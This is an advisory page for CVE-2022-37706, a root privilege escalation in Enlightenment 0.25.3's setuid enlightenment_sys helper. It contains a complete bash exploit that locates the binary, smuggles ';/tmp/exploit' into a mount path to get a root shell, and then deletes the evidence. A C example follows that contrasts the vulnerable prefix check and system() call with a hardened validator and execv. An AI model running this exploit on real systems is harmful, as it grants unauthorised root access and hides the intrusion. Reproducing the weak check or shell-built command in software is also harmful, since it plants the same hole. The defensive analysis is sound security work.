Enlightenment 0.25.3 Privilege Escalation
Enlightenment version 0.25.3 suffers from a local privilege escalation vulnerability.
## Title: Enlightenment Version: 0.25.3 LPE
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706

## Description:
Enlightenment version 0.25.3 is vulnerable to local privilege escalation. `enlightenment_sys` in Enlightenment before 0.25.4 allows local users to gain privileges because the binary is setuid root and its use of the `system()` library function mishandles pathnames that begin with a `/dev/..` substring: a caller-supplied "device" path that passes the `/dev/` prefix check is spliced into a mount command line and interpreted by the shell, so a `;` inside the path runs an arbitrary command as root. Any attacker with local access to a machine on which Enlightenment is installed can therefore obtain a root shell.

## STATUS: CRITICAL Vulnerability

## Tested on:
```bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION="Ubuntu 22.10"
PRETTY_NAME="Ubuntu 22.10"
NAME="Ubuntu"
VERSION_ID="22.10"
VERSION="22.10 (Kinetic Kudu)"
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
```

[+] Exploit:
```bash
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

# The actual problem: a setuid-root enlightenment_sys anywhere on the system
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)

if [[ -z ${file} ]]
then
    echo "[-] Couldn't find the vulnerable SUID file..."
    echo "[*] Enlightenment should be installed on your system."
    exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"

# Mount point, plus a "device" directory whose name contains ';' so the shell
# that enlightenment_sys invokes runs /tmp/exploit after the mount arguments
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

# Payload executed as root by the injected ';'
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit

echo "[+] Welcome to the rabbit hole :)"

# The /dev/.. prefix satisfies the binary's path check; the rest is command injection
${file} /bin/mount -onoexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),"/dev/../tmp/;/tmp/exploit" /tmp///net

read -p "Press any key to clean the evidence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net

echo -e "Done; Everything is clear ;)"
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)

## Proof and Exploit:
[href](https://streamable.com/zflbgg)

## Time spent
`01:00:00`
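The description above names two separate mistakes that combine into the root shell: a path check that only looks at the `/dev/` prefix (so `/dev/../tmp/...` is accepted although it is not under `/dev`), and a privileged helper that hands a caller-influenced string to `system()`, where `;` starts a second command. The following is an added illustrative example written for this page; it is not Enlightenment's source code and does not claim to be the upstream 0.25.4 fix. It models the bug class with a weak prefix check beside a component-by-component check, and a `system()`-style command string beside an `execv(2)` argument vector that no shell ever parses. All function names (`weak_is_device`, `build_mount_cmd_vuln`, `safe_is_device`, `build_mount_argv_safe`) are this example's own, and nothing is executed: the vulnerable function only returns the string a `system()` call would have received.

```c
/*
 * Added illustrative example, NOT Enlightenment's source code: a minimal
 * model of the bug class behind CVE-2022-37706. A setuid-root helper takes
 * a "device" path from an unprivileged caller, checks only that it starts
 * with "/dev/", splices it into a mount command line and would pass that
 * string to system(). Two independent defects are shown, each with a fix:
 *   1. the prefix check is defeated by "..": "/dev/../tmp/x" is not a device;
 *   2. the command string is parsed by /bin/sh, so ';' in the path runs a
 *      second command as root.
 * Function names below are this example's own (hypothetical).
 */
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CMD_MAX 1024

/* Defect 1: prefix match only. "/dev/../tmp/;/tmp/exploit" passes. */
bool weak_is_device(const char *path)
{
    return strncmp(path, "/dev/", 5) == 0;
}

/*
 * Vulnerable pattern: build one shell command line. Returns the string that
 * system() would receive, or NULL if the weak check fails. Nothing is run;
 * the static buffer exists only so the result can be inspected.
 */
const char *build_mount_cmd_vuln(const char *dev, const char *mnt)
{
    static char cmd[CMD_MAX];
    if (!weak_is_device(dev))
        return NULL;
    int r = snprintf(cmd, sizeof cmd, "/bin/mount -o nosuid,nodev %s %s", dev, mnt);
    if (r < 0 || (size_t)r >= sizeof cmd)
        return NULL;
    return cmd; /* "... /dev/../tmp/;/tmp/exploit /tmp///net": sh runs /tmp/exploit too */
}

/*
 * Fix for defect 1: require "/dev/", then walk every path component and
 * reject "", "." and ".." so the path cannot escape /dev. Shell
 * metacharacters are refused as well, so the value stays inert even if some
 * caller still builds a command string.
 */
bool safe_is_device(const char *path)
{
    if (strncmp(path, "/dev/", 5) != 0)
        return false;
    if (strpbrk(path, ";|&$`\"'<>()*?[]{}\\\n\t ") != NULL)
        return false;
    const char *p = path + 5;
    for (;;) {
        const char *slash = strchr(p, '/');
        size_t len = slash ? (size_t)(slash - p) : strlen(p);
        if (len == 0)                               /* "//" or trailing "/" */
            return false;
        if (len == 1 && p[0] == '.')                /* "." */
            return false;
        if (len == 2 && p[0] == '.' && p[1] == '.') /* ".." */
            return false;
        if (!slash)
            return true;
        p = slash + 1;
    }
}

/*
 * Fix for defect 2: never route caller-influenced strings through a shell.
 * Build an argv for execv(2) instead; each value is exactly one argument,
 * so ';' has no meaning. Returns argc, or -1 if validation fails or the
 * array is too small. The array is NULL-terminated as execv expects.
 */
int build_mount_argv_safe(const char *dev, const char *mnt, const char **argv, size_t max)
{
    if (!safe_is_device(dev) || max < 6)
        return -1;
    argv[0] = "/bin/mount";
    argv[1] = "-o";
    argv[2] = "nosuid,nodev";
    argv[3] = dev;
    argv[4] = mnt;
    argv[5] = NULL;
    return 5;
}

int main(void)
{
    const char *evil = "/dev/../tmp/;/tmp/exploit"; /* path from the exploit above */
    const char *argv[8];
    printf("weak check accepts evil path: %s\n", weak_is_device(evil) ? "yes" : "no");
    printf("system() would receive:      %s\n", build_mount_cmd_vuln(evil, "/tmp///net"));
    printf("safe check accepts evil path: %s\n", safe_is_device(evil) ? "yes" : "no");
    printf("safe argv for /dev/sda1: argc=%d\n", build_mount_argv_safe("/dev/sda1", "/mnt", argv, 8));
    return 0;
}
```

Run stand-alone, the program shows the weak check accepting the exploit's path and the resulting command line carrying `;/tmp/exploit`, while the hardened check refuses it and the `execv` path only ever produces a fixed five-element argument vector. The component walk matters even once the shell is gone: without it, `/dev/../etc/shadow` would still be accepted as a "device" and handed to a root-privileged mount.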
Related news
CVE-2022-37706: GitHub - MaherAzzouzi/CVE-2022-37706-LPE-exploit: A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)
enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.
Ubuntu 22.04.1 X64 Desktop Enlightenment 0.25.3-1 Privilege Escalation
This Metasploit module exploits a command injection within Enlightenment's enlightenment_sys binary. This is done by calling the mount command and feeding it paths which meet all of the system requirements, but execute a specific path as well due to a semi-colon being used. This module was tested on Ubuntu 22.04.1 X64 Desktop with enlightenment 0.25.3-1 (current at module write time).